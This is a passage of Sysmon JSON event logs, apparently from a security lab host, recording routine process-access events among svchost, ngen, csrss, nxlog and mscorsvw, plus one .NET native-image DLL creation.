{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9141,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.638\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-001001D51100}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.638","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-001001D51100}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9142,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.794\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-001053D81100}\r\nTargetProcessId: 5020\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.794","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-001053D81100}","TargetProcessId":"5020","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9143,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.794\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-001053D81100}\r\nTargetProcessId: 5020\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.794","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-001053D81100}","TargetProcessId":"5020","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9144,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C8-5F25-0000-001053D81100}\r\nTargetProcessId: 5020\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C8-5F25-0000-001053D81100}","TargetProcessId":"5020","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9145,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:37.029\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:37.029","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9146,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:37.747\r\nProcessGuid: {E2A3D6B1-13C8-5F25-0000-001053D81100}\r\nProcessId: 5020\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\139c-0\\System.Xaml.dll\r\nCreationUtcTime: 2020-08-01 07:03:37.747","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:37.747","ProcessGuid":"{E2A3D6B1-13C8-5F25-0000-001053D81100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\139c-0\\System.Xaml.dll","CreationUtcTime":"2020-08-01 07:03:37.747","EventReceivedTime":"2020-08-01 07:03:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9147,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:37.810\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C9-5F25-0000-001028DC1100}\r\nTargetProcessId: 4140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:37.810","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C9-5F25-0000-001028DC1100}","TargetProcessId":"4140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9148,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:37.810\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C9-5F25-0000-001028DC1100}\r\nTargetProcessId: 4140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:37.810","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C9-5F25-0000-001028DC1100}","TargetProcessId":"4140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9149,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:37.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: 